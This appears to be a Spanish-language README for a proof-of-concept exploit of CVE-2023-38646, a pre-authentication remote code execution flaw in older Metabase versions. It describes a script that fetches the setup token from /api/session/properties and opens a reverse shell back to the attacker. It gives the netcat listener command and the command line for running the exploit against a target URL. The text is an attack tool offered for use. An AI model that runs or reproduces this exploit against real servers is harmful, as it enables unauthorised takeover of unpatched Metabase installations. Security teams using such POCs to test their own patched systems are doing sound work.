
Metabase POC de RCE Pre-Autenticación
Metabase de código abierto anterior a 0.46.6.1 y Metabase Enterprise anterior a 1.46.6.1 permiten a los atacantes ejecutar comandos arbitrarios en el servidor. He escrito el script directamente para obtener una reverse shell en la máquina del atacante.
El script requiere la URL del objetivo, la IP y el puerto del atacante. No es necesario proporcionar el setup token para este exploit, ya que el script intenta obtenerlo de /api/session/properties.
Asegúrate de iniciar un listener de netcat en la máquina del atacante con el siguiente comando:
nc -nlvp {Puerto}
Ejecuta el script POC con:
python3 CVE-2023-38646.py -u <target-url> -ip <IP> -p <PORT>
